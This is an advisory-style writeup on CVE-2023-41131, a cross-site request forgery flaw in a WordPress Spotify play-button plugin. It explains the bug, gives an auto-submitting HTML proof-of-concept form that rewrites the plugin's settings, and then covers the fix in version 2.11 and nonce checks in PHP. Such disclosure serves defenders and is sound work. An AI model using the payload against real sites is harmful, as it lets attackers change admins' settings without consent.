On August 22, 2023, a new Cross-Site Request Forgery (CSRF) vulnerability was reported in the "Follow me Darling Sp*tify Play Button" WordPress plugin, specifically affecting versions up to and including 2.10. This vulnerability, registered as CVE-2023-41131, could let attackers make changes on a user's behalf—all without their consent.
What Is "Follow me Darling Sp*tify Play Button"?
"Follow me Darling Sp*tify Play Button" is a WordPress plugin that lets site owners easily embed Spotify Play buttons and "Follow Me" features on their pages and posts.
What is CSRF?
Cross-Site Request Forgery (CSRF) is a web security bug that tricks logged-in users into executing unwanted actions on a website where they're authenticated. If a site doesn't properly verify requests, attackers can fool browsers into sending commands (like changing plugin settings or even deleting data).
Vulnerability Details: Where Is the Hole?
The plugin failed to verify user intent when processing form submissions or Ajax requests. That means if an attacker could convince an admin-user to visit a booby-trapped website (while logged into WordPress), requests could be sent to the vulnerable site that perform actions with the admin's credentials.
Vulnerability Type: CSRF (no nonce checks for settings update)
- Potential Impact: Attacker can change plugin settings, possibly altering placement, button texts, or even adding malicious Spotify URLs.
Admin is logged into WordPress dashboard.
2. The attacker creates a fake website containing a silent, auto-submitting form or image that points to the admin action URL for the plugin.
3. When the admin visits this site, their browser sends the request to the WordPress site as if it came from them.
Here’s a proof-of-concept HTML code an attacker might host elsewhere
<!--
This form will send a POST request to the vulnerable plugin's settings page,
changing the Spotify Play Button embed code to a malicious one.
-->
<html>
<body>
<form action="https://target-vulnerable-site.com/wp-admin/options-general.php?page=follow-me-darling-spotify-play-button"; method="POST" id="csrfForm">
<!-- Hidden fields with values the attacker wants to set -->
<input type="hidden" name="spotify_url" value="https://open.spotify.com/track/evil-track-id">;
<input type="hidden" name="button_text" value="Click here for Free Music!">
<input type="hidden" name="submit" value="Save Changes">
</form>
<script>
// Auto-submit the form as soon as the user loads the page
document.getElementById('csrfForm').submit();
</script>
</body>
</html>
What happens here?
- If the logged-in WordPress admin visits this malicious page, the plugin accepts the POST request with no security verification, changing its own embed settings!
1. Update the Plugin
This vulnerability is fixed in version 2.11. Always keep your plugins updated!
Go here to update:
WordPress Plugin Page — Follow me Darling Sp*tify Play Button
2. Check for Nonces
If you’re a plugin developer, *always* require a WordPress nonce (using wp_nonce_field() and check_admin_referer()) on every action that changes data.
Example Fixed Code (Plugin-side PHP)
// Add here in your plugin's settings handling code
if (!isset($_POST['plugin_settings_nonce']) || !wp_verify_nonce($_POST['plugin_settings_nonce'], 'plugin_settings_action')) {
wp_die('Security check failed');
}
// Proceed with updating settings
3. Restrict Admin Access
Don’t browse unknown sites while logged into your WordPress admin panel!
Original References
- CVE-2023-41131 at MITRE
- WPScan Vulnerability DB - CVE-2023-41131
- Plugin Changelog / Fixed Version
- Official Plugin Page
Final Thoughts
CVE-2023-41131 is a classic example of why even small WordPress plugins need security reviews. Cross-Site Request Forgery is easy to exploit and can have big consequences—including hijacked displays, altered links, and worse.
Advice:
If you’d like to learn more
- OWASP — Cross-Site Request Forgery (CSRF) Overview
- WordPress Nonces Explained
*This writeup was prepared exclusively for your deep-dive by an AI cybersecurity enthusiast.*
Timeline
Published on: 10/12/2023 15:15:46 UTC
Last modified on: 10/16/2023 12:57:06 UTC